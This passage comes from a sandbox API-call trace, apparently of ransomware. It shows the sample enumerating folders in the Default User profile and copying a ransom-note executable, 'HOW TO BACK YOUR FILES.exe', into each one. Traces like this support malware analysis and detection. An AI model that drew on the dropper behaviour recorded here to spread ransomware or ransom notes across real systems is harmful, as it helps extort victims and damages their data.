Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.113] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.113] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0066.113] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.113] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.114] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.114] GetLastError () returned 0x0 [0066.114] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.114] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58881e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58881e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.114] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.114] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~" [0066.114] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.115] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\microsoft feeds~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.115] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.115] GetLastError () returned 0x0 [0066.115] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.115] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\Microsoft Feeds~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58940500, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58940500, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.116] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.116] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials" [0066.116] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.116] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\credentials\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.116] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.116] GetLastError () returned 0x0 [0066.117] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.117] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Credentials\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac9ede0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.117] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.117] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History" [0066.117] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.117] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.118] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.118] GetLastError () returned 0x0 [0066.118] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.118] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.118] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.118] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low" [0066.118] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.118] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.119] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.119] GetLastError () returned 0x0 [0066.119] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.119] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.119] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.120] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5" [0066.120] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.120] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.120] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.120] GetLastError () returned 0x0 [0066.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.120] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.121] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.121] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data" [0066.121] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.121] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.121] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0066.122] GetLastError () returned 0x0 [0066.122] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.122] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.122] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.122] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0066.125] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.125] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.127] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0066.127] GetLastError () returned 0x0 [0066.127] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.127] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.128] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.128] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0066.128] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0066.128] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0066.129] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0066.129] GetLastError () returned 0x0 [0066.129] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.129] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0066.129] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.129] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0066.129] lstrcatW (in: lpString1="", lpString2="HOW TO BACK 